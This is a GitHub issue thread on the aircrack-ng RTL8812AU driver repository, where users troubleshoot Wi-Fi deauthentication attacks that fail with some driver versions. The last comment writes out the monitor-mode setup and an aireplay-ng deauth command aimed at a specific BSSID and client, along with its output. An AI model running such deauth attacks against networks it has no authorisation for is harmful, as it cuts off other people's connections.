aircrack-ng / rtl8812au

RTL8812AU/21AU and RTL8814AU driver with monitor mode and frame injection
GNU General Public License v2.0
3.39k stars 749 forks source link

RTL8812AU & deauth #771

Open oldstanda opened 3 years ago

oldstanda commented 3 years ago

Why deauth does it not work?

https://www.youtube.com/watch?v=laZaAVc7yKU

oldstanda commented 3 years ago

The same is with kernel 5.9.6 and driver 5.7.0 ;-(

https://www.youtube.com/watch?v=6X2l1nD6cDw

oldstanda commented 3 years ago

8812 vs 818b

https://www.youtube.com/watch?v=hN8T19eVf58

lrosic00 commented 3 years ago

Yeah, I got the same problem

oldstanda commented 3 years ago

On these drivers 5.9.3.2 https://github.com/morrownr/8812au deauth works on the 5.4.0-54 kernel.

senyuuri commented 3 years ago

On these drivers 5.9.3.2 https://github.com/morrownr/8812au deauth works on the 5.4.0-54 kernel.

Thank you @oldstanda. The new driver works like a charm.

To share more context of the issue: I wasn't able to conduct a deauth attack with the v5.6.4.2 driver on my AWUS036ACH. I was testing on Kali with 5.8.0-kali2-amd64 kernel.

More specifically, the symptom was:

After installing the v5.9.3.2 driver:

mkarne1 commented 1 year ago

@oldstanda

I can't deauthenticate any client from any Wifi. I installed the latest driver with the following commands:

sudo apt-get install bc mokutil build-essential libelf-dev linux-headers-`uname -r`
reboot
git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
cd rtl
make dkms_install  

Afterwards, I ran:

airmon-ng check kill
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
airodump-ng --bssid D4:3D:F3:74:F3:91 --channel 5 --write /tmp/test wlan0

And in a new terminal:

aireplay-ng --deauth 1000 -a D4:3D:XX:XX:XX:91 -c 14:7D:XX:XX:XX:44 wlan0          
19:46:04  Waiting for beacon frame (BSSID: D4:3D:F3:74:F3:91) on channel 5
19:46:05  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [31|73 ACKs]
19:46:05  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [74|89 ACKs]
19:46:06  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [136|118 ACKs]
19:46:06  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [ 2|63 ACKs]
19:46:07  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [ 0|63 ACKs]
19:46:07  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [ 1|64 ACKs]
19:46:08  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [14|65 ACKs]
19:46:08  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [89|89 ACKs]
19:46:09  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [74|88 ACKs]
19:46:09  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [128|119 ACKs]

It just keeps sending deauth packets but the client isn't deauthenticating.

Any help would be really appreciated!

Thanks!